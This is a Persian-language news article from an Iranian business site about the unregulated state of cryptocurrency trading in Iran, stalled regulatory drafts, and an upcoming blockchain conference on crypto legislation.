آمارهای غیر رسمی خبر از حضور میلیون‌ها کیف پول فعال رمزارزی در ایران می‌‌داد، همچنین هزار میلیارد تومان‌هایی که دیگر شمردنشان سخت بود از لفظ همت در روز استفاده می‌شد، میزان پولی که هر روز به واسطه رمز ارزهایی مثل بیت کوین در ایران جابه‌جا می‌شدند.

در این بین اما همچنان قانون مشخصی درباره رمزارزها در ایران وجود ندارد. بانک مرکزی از حدود ۳ سال قبل، پیش‌نویسی را درباره چارچوب گذاری رمزارزها ارائه کرد که علی رقم انتقادات بسیار تا کنون به نتیجه نرسیده است. اخیرا هم محمدرضا پورابراهیمی رییس کمیسیون اقتصادی مجلس و محسن رضایی معاون اقتصادی رئیس جمهور آستین بالا زده اند تا موضوع رمزارزها در ایران قانونی شود.

صرافی‌های رمزارزی بسیاری در ایران وجود دارند که نه قانونی هستند و نه غیر قانونی. بسیاری از این صرافی‌ها تحت نظارت پلیس فتا و سایر ارگان‌های رگولاتوری هستند، اما از آنجایی که موضوع خرید و فروش رمزارزها در ایران قانون مشخصی ندارد، زمینه کلاهبرداری برای افراد سودجو شدیدا فراهم می‌شود.

قانون گذاری رمز ارزها در ایران، به زودی!
شنیده‌ها حاکی از آن هستند که قرار است مجلس شورای اسلامی و دولت به همکاری بانک مرکزی و برخی وزارت خانه‌ها به زودی تکلیف این موضوع را روشن کنند. در همایش کاربردی اقتصاد بلاکچین و آینده دارایی‌های دیجیتال، یکی از اصلی ترین میزگردها به موضوع قانون‌گذاری مربوط است. قرار است با حضور بسیاری از نهاد‌های تصمیم‌گیر از جمله مجلس شورای اسلامی، بانک مرکزی، دولت، وزارت اقتصاد و ارتباطات در این همایش، از آخرین اخبار قانون‌گذاری رمزارزها در ایران آگاه شویم و با حضور شرکت‌های فعال رمزارزی و کامیونیتی کریپتوکارنسی و بلاکچین ایران، حلقه اتصال محکمی بین بخش خصوصی و حاکمیتی شکل بگیرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران